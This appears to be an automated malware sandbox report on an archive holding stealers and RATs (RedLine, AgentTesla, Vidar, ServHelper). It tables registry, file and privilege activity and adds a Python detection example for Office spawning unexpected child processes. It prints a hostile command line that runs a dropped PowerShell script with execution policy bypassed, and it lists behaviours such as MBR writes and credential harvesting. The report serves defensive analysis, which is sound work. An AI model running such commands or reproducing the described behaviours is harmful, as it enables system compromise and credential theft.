Analysis Overview
SHA256
2214bdc78b558176a17484bcc02079a5470e0b49073d50d19b522d67dc4396e3
Threat Level: Known bad
The file 4.zip was found to be: Known bad.
Malicious Activity Summary
RedLine
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
AgentTesla
Azorult
Snake Keylogger
Vidar
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M1
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
WarzoneRat, AveMaria
Guloader,Cloudeye
Process spawned unexpected child process
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
Gozi_ifsb family
RedLine Payload
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
ServHelper
Grants admin privileges
AgentTesla Payload
Vidar Stealer
Executes dropped EXE
Sets DLL path for service in the registry
Patched UPX-packed file
UPX packed file
Modifies RDP port number used by Windows
Modifies extensions of user files
VMProtect packed file
Blocklisted process makes network request
Drops file in Drivers directory
Possible privilege escalation attempt
Downloads MZ/PE file
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
Reads user/profile data of web browsers
Deletes itself
Modifies file permissions
Checks computer location settings
Writes to the Master Boot Record (MBR)
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Adds Run key to start application
Accesses 2FA software files, possible credential harvesting
Checks installed software on the system
Modifies WinLogon
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Program crash
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Kills process with taskkill
Checks processor information in registry
Modifies registry key
Runs net.exe
Modifies data under HKEY_USERS
NTFS ADS
Enumerates system info in registry
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Modifies system certificate store
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Script User-Agent
Delays execution with timeout.exe
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-07-30 15:26
Signatures
Gozi_ifsb family
Patched UPX-packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral12
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
12s
Max time network
58s
Command Line
Signatures
Guloader,Cloudeye
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe
"C:\Users\Admin\AppData\Local\Temp\42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe"
Network
Files
memory/1100-62-0x0000000000290000-0x00000000002A3000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210408
Max time kernel
151s
Max time network
163s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPCONTAINER\MAPPINGS\S-1-15-2-2798741541-1756884518-3467925786-3194416866-1105858778-295669072-3630435502\CHILDREN | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2798741541-1756884518-3467925786-3194416866-1105858778-295669072-3630435502 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2798741541-1756884518-3467925786-3194416866-1105858778-295669072-3630435502\Moniker = "oice_16_974fa576_32c1d314_1e11" | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_1e11 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_1e11 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_1e11\Children | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPCONTAINER\STORAGE\OICE_16_974FA576_32C1D314_1E11\CHILDREN | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2798741541-1756884518-3467925786-3194416866-1105858778-295669072-3630435502 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2798741541-1756884518-3467925786-3194416866-1105858778-295669072-3630435502\DisplayName = "OICE_16_974FA576_32C1D314_1E11" | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2798741541-1756884518-3467925786-3194416866-1105858778-295669072-3630435502\Children | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\{683C9910-647D-49CA-B8ED-A9F2AE771570}\abdtfhghgdghghœ.ScT:Zone.Identifier | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 784 wrote to memory of 3644 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE |
| PID 784 wrote to memory of 3644 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf" /o ""
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE
"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE" C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
Network
Files
memory/784-117-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
memory/784-118-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
memory/784-119-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
memory/784-120-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
memory/784-121-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
memory/784-122-0x00007FFDF8250000-0x00007FFDFAD73000-memory.dmp
memory/784-125-0x00007FFDF4780000-0x00007FFDF586E000-memory.dmp
memory/784-126-0x00007FFDF2250000-0x00007FFDF4145000-memory.dmp
memory/3644-363-0x0000000000000000-mapping.dmp
memory/3644-365-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
memory/3644-366-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
memory/3644-367-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\oice_16_974fa576_32c1d314_1e11\AC\Temp\FLD509.tmp
| MD5 | 263ff32cc8b100ddcef2fede237bdcbb |
| SHA1 | 3faab71d14c778b6d7090e508dc68c6fc1a738fe |
| SHA256 | acb51bb46e7b6f5c713c68b63c9193516fae376b7214fb102700d08097ad33e2 |
| SHA512 | bde84fc92350935f7e5e4edc15095568bb33463ce427a97d54b28d4873231ee70cfea682aae75f0d50d9ad9bc4bd986bc8a529b71ff3dcbbeb450e48b9b273fe |
memory/3644-369-0x00007FFDD78A0000-0x00007FFDD78B0000-memory.dmp
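Reading the behavioral19 run: the sandbox flags WINWORD.EXE (PID 784) spawning FLTLDR.EXE (PID 3644) with `C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT` as its argument, records two WriteProcessMemory calls from 784 into 3644, and shows WINWORD opening a `.ScT` (scriptlet) file with a `Zone.Identifier` stream under `%TEMP%` for modification. Two host-side checks cover this: a parent/child allowlist for Office processes, and a rule for Office writing files with script-like extensions, with the NTFS stream suffix stripped before the extension is examined (otherwise `.ScT:Zone.Identifier` never matches). The Python below is an added example, not the sandbox's code. The event dictionaries are constructed from the paths visible in this report (their field layout is this example's own), the `splwow64.exe` event is an invented benign control, and the allowlist is a placeholder an analyst would tune, since FLTLDR.EXE is Office's own graphics-filter loader and can also appear when a document legitimately embeds an image that needs a filter.

```python
import re

OFFICE_APPS = {'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe', 'msaccess.exe'}
# Placeholder allowlist for this example: children an analyst has decided Office may
# spawn in their estate. Tune it against real telemetry; FLTLDR.EXE is deliberately absent.
EXPECTED_OFFICE_CHILDREN = {'splwow64.exe'}
SCRIPT_EXTS = {'.sct', '.js', '.jse', '.vbs', '.vbe', '.wsf', '.wsh', '.hta', '.ps1', '.bat', '.cmd'}

WINWORD = r'C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE'
FLTLDR = (r'C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64'
          r'\Microsoft Shared\OFFICE16\FLTLDR.EXE')

# Constructed events modelled on the behavioral19 run above. The dict layout is this
# example's own (not the sandbox's); the splwow64.exe event is an invented benign control.
EVENTS = [
    {'kind': 'process', 'parent_image': WINWORD, 'image': FLTLDR,
     'cmdline': '"' + FLTLDR + r'" C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT'},
    {'kind': 'process', 'parent_image': WINWORD, 'image': r'C:\Windows\splwow64.exe',
     'cmdline': r'C:\Windows\splwow64.exe 12288'},
    {'kind': 'file', 'image': WINWORD,
     'target': r'C:\Users\Admin\AppData\Local\Temp\{683C9910-647D-49CA-B8ED-A9F2AE771570}'
               r'\abdtfhghgdghghœ.ScT:Zone.Identifier'},
]


def basename(path):
    """Last path component of a Windows path."""
    return path.rsplit('\\', 1)[-1]


def strip_ads(path):
    """Drop an NTFS alternate data stream suffix: file.ext:Zone.Identifier -> file.ext.
    Only the final component is inspected, so the drive-letter colon is untouched."""
    name = basename(path)
    if ':' in name:
        name = name.split(':', 1)[0]
    return path[: len(path) - len(basename(path))] + name


def extension(path):
    """Lower-cased extension of the real file name, ignoring any stream suffix."""
    m = re.search(r'\.[^.\\]+$', strip_ads(path))
    return m.group(0).lower() if m else ''


def evaluate(events):
    """Return (rule, ...) tuples for every event that trips one of the two rules."""
    findings = []
    for ev in events:
        if ev['kind'] == 'process':
            parent = basename(ev['parent_image']).lower()
            child = basename(ev['image']).lower()
            if parent in OFFICE_APPS and child not in EXPECTED_OFFICE_CHILDREN:
                findings.append(('office_unexpected_child', parent, child, ev['cmdline']))
        elif ev['kind'] == 'file':
            writer = basename(ev['image']).lower()
            if writer in OFFICE_APPS and extension(ev['target']) in SCRIPT_EXTS:
                findings.append(('office_wrote_script_file', writer, strip_ads(ev['target'])))
    return findings


if __name__ == '__main__':
    for finding in evaluate(EVENTS):
        print(finding)
```

Run against the constructed events, the FLTLDR.EXE launch and the `.ScT` write are reported and the splwow64.exe control is not; adding `fltldr.exe` to the allowlist silences the first finding, which is exactly the tuning decision the sandbox's "not expected to spawn this process" verdict leaves to the analyst.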
Analysis: behavioral26
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:34
Platform
win7v20210410
Max time kernel
137s
Max time network
82s
Command Line
Signatures
ServHelper
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe1.exe | N/A |
| N/A | N/A | C:\Users\Public\Documents\Wondershare\NFWCHK.exe | N/A |
Modifies RDP port number used by Windows
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Sets DLL path for service in the registry
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a74ffc7-9cca-4845-bd46-8ff96c4ac43f | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c0b142a5-2b59-45fd-a99b-ce1f142c850f | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_55dbdebd-e428-42e4-82e2-2ef0cdfc7458 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dcd10f91-0b5f-40f7-b451-e272660bae5d | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ac761484-0ecd-4b05-83ec-285cc54d0e96 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_90ab2bf7-a5b2-485f-bbb1-f5e3aeea5b24 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_578ff6f3-25c8-4688-81c3-ff3e7179e5c3 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z2QY7QFOTGMKT0BUNU70.temp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e0bb34e5-3a6d-4514-8e04-07c75cc5c314 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_abd106a9-f5f6-41e9-b78b-a62c298b662f | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c4a40091-f455-420c-bbdd-90c865751b3b | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c695c2dd-95c9-457e-b147-d950bcde996e | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80bafa925785d701 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
"C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe"
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
